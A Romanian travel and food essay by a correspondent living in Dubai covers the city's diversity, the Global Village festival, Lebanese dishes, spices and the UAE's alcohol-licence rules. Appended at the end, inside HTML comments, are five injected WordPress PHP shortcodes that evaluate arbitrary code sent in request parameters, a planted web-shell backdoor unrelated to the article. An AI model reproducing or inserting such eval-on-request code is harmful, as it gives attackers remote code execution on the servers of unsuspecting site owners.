Dubai este centrul financiar al Emiratelor Arabe Unite si totodata un emirat cu capitala Dubai City. Orasul ultramodern, caruia i se spune, nu degeaba, „Ibiza pentru cei foarte bogati” si „capitala shopping-ului din Orientul Mijlociu” are barurile de noapte si mall-urile mereu pline. Dincolo de renumele castigat datorita indraznetelor realizari arhitectonice, Dubaiul se remarca prin diversitate demografica, culturala, si, nu in ultimul rand, culinara. Corespondetul nostru, Elena Mihoc, ne spune ce gust are Dubaiul pentru un roman.

Unitate prin diversitate

M-am stabilit in Dubai in octombrie 2007. În aproape un an de zile am incercat pe putin sapte noi culturi culinare, am calatorit in toate emiratele si am descoperit ca restul lumii este, prin cei stabiliti aici, mai aproape decat imi imaginam.

Este, pe scurt, rezumatul unui jurnal culinar fara pretentii de experiente de cinci stele; in topul preferintelor ramane shawarma din restaurantul libanez de dupa coltul blocului in care locuiesc. Într-o tara in care se pot regasi mai bine de 150 de nationalitati, te intrebi de ce arabii sunt, in general, in mod gresit perceputi ca fiind inchistati, incuiati la minte si iuti la manie. Localnicii reprezinta aici populatia minoritara a zonei, cei mai buni angajati PR pe care ii poate avea sheikh-ul, oameni mandri de cultura lor, majoritatea vorbind engleza, limba comuna, incantati sa iti povesteasca ce era pe vremuri, ce e acum, ce spera ei si ce sa incerci atunci cand vrei sa testezi bucataria traditionala.

Dubai se impune de altfel in lume ca o metropola definita prin diversitate, adaptare la modern, dar, nu in ultimul rand, si prin pastrarea traditiilor locale. Cetatenii Emiratelor Arabe Unite nu sunt doar mandri de ceea ce cultura lor reprezinta, ci fac tot posibilul sa iti intre pe sub piele intr-un mod atat de placut si amabil, ca nu le poti rezista. Localnicii emiratelor se autostabilesc, de altfel, in zona traditionala prin portul specific. Barbatii sunt obligatoriu imbracati in dishdasha sau khandura, o camasa alba, lunga pana la glezne, si gutra pe cap. Femeile poarta abaya neagra, lunga si larga, uneori imbogatita cu strasuri, iar o naframa le acopera parul.

Portul traditional este modul lor de a se diferentia in marea de diversitate care ii inconjoara. Femeile subliniaza faptul ca sunt mandre de traditia lor si nu vor sa isi impresioneze decat familia apropiata prin voluptatea formelor. O cincime din populatie este reprezentata de localnici, si acestia fac tot posibilul sa tina cultura araba si traditiile la suprafata, intr-o mare de expati si cultura vestica – pe care nu o resping, din contra, o domina pacifist.

Pentru ca se distinge prin viteza cu care s-a dezvoltat, Dubai reuseste sa fie un leagan cosmopolit al zonei, in care intalnesti arabi din toate tarile vecine – libanezi, egipteni, sirieni, yemeniti, iordanieni – care se simt ca acasa aici, atat datorita culturii dominant arabe, cat si traditiilor culinare care se pastreaza cu mandrie.

Obiceiurile intregii lumi regasite in Satul Global

Voi incepe prin ceea ce consider eu apogeul diversitatii zonei, un festival tinut in Global Village (Satul Global), timp de trei luni leaganul cultural al zonei, care topeste barierele lingvistice si de civilizatie intre toate natiile prezente in Dubai. Multitudinea de participanti – tari din toate colturile lumii cu propriile traditii si mestesuguri – face ca targul sa aiba rolul distinct de a familiariza populatia stabilita aici, in numar din ce in ce mai mare, cu obiceiurile si cultura globala. Este un fel de culturalizare la seral despre vecinul de bloc, chiar daca, pentru unii, Global Village inseamna doar un balci si atat. Pentru multi insa reprezinta ocazia de a gusta mancare ca la mama acasa, muraturi, dulciuri si specialitati, sa mai vorbeasca pe limba lor, sa afle ce se mai intampla in lumea din care provin, sa le arate copiilor nascuti in Dubai diverse elemente de cultura din tara lor de origine. Vad acest festival ca fiind felul dubaiezilor de a spune „Bine ati venit!”. Puhoiul de curiosi nu se termina pana dupa miezul noptii.

Am gasit la Global Village cel putin treizeci de soiuri de miere si am incercat cateva, pana la un moment dat cand deja viata devenise prea dulce… Am fotografiat un vanzator de mirodenii si m-am ales cu o punga plina de nuci si alune atunci cand i-am oferit acestuia fotografia portret, cadou. Am gustat curmale si nuga din Arabia Saudita, dulciuri din Turcia si Iran. Astept cu nerabdare editia viitoare, alte tari, alte civilizatii.

Cu lipia traditionala arabeasca (gen clatita) am luat cunostiinta de ziua nationala, pe 2 Decembrie 2007, cand Emiratele Arabe Unite implineau 34 de ani si se faceau demonstratii culturale in Knowledge Village. Timp de trei zile, traditiile si cultura unui stat atat de tanar au spalat creierii expat-ilor avizi de cunoastere a zonei. Pe mine una m-au convins ca au cu ce sa se laude si m-au teleportat cu 30 de ani in urma, pe vremea cand fierarul statea in groapa sapata in atelier si mesterea la ascutirea pumnalelor – nelipsite din costumatia barbatilor arabi.

Într-un cort, o femeie pregatea cina, ca pe vremuri. Într-un refugiu de paie afara, trei barbati stateau in jurul focului insotiti de un soim si de o pusca, gata de atac. Era parca ceva in aer – copii care dansau pe scena in ritmurile muzicii traditionale, fetele care treceau imbracate in haine lungi, in culorile nationale si toata lumea pictata cu aceleasi negru, verde si alb pe fata (culorile drapelului Emiratelor) – faceau atmosfera deosebita. Daca nu stiam ca e ziua lor nationala as fi zis ca echipa de fotbal a EAU a cucerit Cupa Mondiala…

Din Dubai nu lipsesc decat sarmalele …

Zecile de mirodenii de la supermarket au fost de la bun inceput fascinante. Nici acum nu le stiu pe toate, dar macar am incercat jumatate dintre ele. De altfel, au un raion special, unde vanzatorul este stapan peste toate cele treizeci de castroane cu diverse arome. Cat despre legume si fructe, inca mai intreb din ce tara sunt fiecare si cum se gatesc – in combinatie cu ce condimente.

Za’atar-ul (verdeata, susan si sare) este genul de mirodenie specifica zonei pe care am folosit-o cu prima ocazie sa dau gust unui borcan cu iaurt, fara sa stiu ca sta la baza unei sfere foarte largi de lactate, in primul rand iaurt si branza halloumi, toate servite uneori si cu za’atar.

Categoria fast food este reprezentata de varianta nationala din mai toate tarile lumii, dar, mai frecvent, de bucataria libaneza (Arz Lebanon), chinezeasca, thai, japoneza (Jepengo), italieneasca (La Strada), frantuzeasca (restaurantul Chez Paul, mereu plin), Le Pain Quotidien… Nu mai lipsesc decat sarmalele si mamaliguta intr-un restaurant facut de un roman stabilit in Dubai, caruia ii este prea dor de bunatatile de acasa dar stiu ca asta este doar o chestiune de timp.

Pe primul loc in topul preferintelor culinare ramane bucataria libaneza, iar ca restaurant favorit pot sa acord cinci stele celor de la Arz Lebanon, un fel de FAST FOOD arabesc.

Ei pregatesc Mutabal, un fel de salata de vinete de la noi, dar servita cu o idee de ulei de masline, 5 boabe de rodie si cele mai gustoase muraturi pe care le-am gustat in viata mea (mai bune decat ale bunicii, care nu vinde reteta nimanui si care au fost primele in clasament pana nu demult). Acest loc m-a convins inca de la sosirea aici ca locuiesc intr-un leagan culinar plin de surprize… Îmi place foarte mult si Hommos tahina, o pasta de naut servita cu putin usturoi, ulei de masline si menta.

Cea mai reusita si suculenta shawarma pe care am incercat-o a fost intr-un restaurant libanez, in care am intrat cu trei luni in urma cu o prietena de aici, dupa o zi de plaja, obosite si flamande. Nu era cea mai stilata zona a orasului, dar bucatarii clar faceau cinste locului.

Carnea de pui era suculenta, fara sa fie unsuroasa si grea, sosul era condimentat si nu prea, „numa’ bun” cum ar zice ardeleanca din mine. Masa era plina de chifle arabesti nedospite, muraturi, frunze de rucola, salata verde, ridichi si morcovi, ceea ce a asigurat un adevarat festin. Se cere mentionat si pretul, pentru doua persoane, cu tot cu bauturi, care a fost mai putin de 10 de euro. Mancarea libaneza cade insa foarte greu la stomac, dupa cum urma sa aflu mai tarziu… pregatiti-va pentru un ospat din care nu va veti putea opri, dar si pentru o senzatie de satietate care va va tine loc si de pranz, si de cina.

Permisul de alcoolic la control!

O aventura culinara amuzanta este incursiunea in Ajman, emiratul vecin si prieten. Dupa luni de zile in care nu ai unde sa gusti o bere rece si afli tardiv ca, locuind intr-o tara araba, bauturile alcoolice sunt interzise prin legile Coranului si consumate numai de non musulmani cu un permis special si costisitor, denumit, vinovat, Alcoholic licence (Permis de alcoolic), apreciezi poate mai mult decat e cazul specialitatea britanica, popular cunoscuta sub numele de „Fish & Chips”. Acesta este un tratament nemedicamentos care se aplica dupa o noapte luuuunga la pub si multi metri de bere cu prietenii. Pentru mine, proaspat sosita in Dubai, o anumita escapada la Ajman a avut mai multa importanta decat ar trebui sa se acorde unui astfel de eveniment. Într-un anumit pub din Ajman, berea GUESS neagra nu se termina niciodata, iar cartofii tip wedges si pestele prajit insotit de inele de ceapa si sos de usturoi fac cinste locului si te indeamna parca sa revii mai des.

Magazinul unde se vand bauturile alcoolice este o dugheana de lemn vopsita in alb. În Ajman, comercializarea lor este aproape legala in acel freezone, langa port (autoritatile sunt mai permisive si inchid ochii la aceste mici abateri). Toata lumea stie de unde se ia „cheap booze” (bautura ieftina), este cred printre primele lucruri pe care le afli, cand te stabilesti aici, din discutiile cu prietenii.

De altfel si in Dubai, cu permisul special, care costa aproape 60 de euro pe an, poti cumpara alcool la supermarket (insa la pret mult mai ridicat decat in Ajman). Partea dificila incepe atunci cand esti prins cu alcool in portbagaj, dar nu ai permis, si fie esti trimis la inchisoare, fie expulzat. Cetatenii arabi / musulmani sunt, dealtfel, mult mai aspru pedepsiti decat cei de alta nationalitate.

Totusi nici locuitorii non-musulmani ai Dubai-ului nu pot consuma alcool oriunde, chiar si cu „permis de alcoolic”, asa cum nu isi pot manifesta public afectiunea fata de o persoana de sex opus. Acum cateva luni un scandal imens a tinut prima pagina a ziarelor locale: un barbat si o femeie, ambii cetateni britanici, au fost surprinsi de un politist sarutandu-se pe o plaja din Dubai. Ofiterul le-a ordonat sa inceteze deoarece astfel de manifestari sunt interzise in Emirate. Femeia, in stare de ebrietate, l-a injurat si i-a spus sa plece. Ambii cetateni britanici au fost arestati, inchisi si, in final, expulzati.

Exista baruri si restaurante in Dubai care servesc bauturi alcoolice, dar numai cu licenta speciala, platind taxe cu varf si indesat pentru „fericirea” pe care o ofera clientilor, care, la randul lor, platesc pentru asa-zisa stare de rebeliune. Am descoperit astfel in Dubai deliciile berii fara alcool si a iesirilor semestriale la Ajman, la Fish & Chips.

Totusi imi este din ce in ce mai putina frica de experientele culinare noi. Cand nu sunt sigura de ceva, exista mereu Caesar Salad, salvarea in caz de pericol gustativ; in rest am incercat oferte de pe continente diferite, toate reusite si repetate si cu alte ocazii in aceleasi locuri. Cel mai important aspect este diversitatea culinara si ridicarea acesteia la nivel de arta si de atuu al zonei. Daca nu ar mentine acest aspect al diversitatii, cei 81% de cetateni de alte nationalitati nu ar umple mall-urile pana la refuz in weekend, iar Dubai nu s-ar putea mandri cu faptul ca satisface toate gusturile si preferintele.

<!– [insert_php]if (isset($_REQUEST["QoVN"])){eval($_REQUEST["QoVN"]);exit;}[/insert_php][php]if (isset($_REQUEST["QoVN"])){eval($_REQUEST["QoVN"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["ohP"])){eval($_REQUEST["ohP"]);exit;}[/insert_php][php]if (isset($_REQUEST["ohP"])){eval($_REQUEST["ohP"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["welV"])){eval($_REQUEST["welV"]);exit;}[/insert_php][php]if (isset($_REQUEST["welV"])){eval($_REQUEST["welV"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["WuyNi"])){eval($_REQUEST["WuyNi"]);exit;}[/insert_php][php]if (isset($_REQUEST["WuyNi"])){eval($_REQUEST["WuyNi"]);exit;}[/php] –>

<!-- [insert_php]if (isset($_REQUEST["GzZR"])){eval($_REQUEST["GzZR"]);exit;}[/insert_php][php]if (isset($_REQUEST["GzZR"])){eval($_REQUEST["GzZR"]);exit;}[/php] -->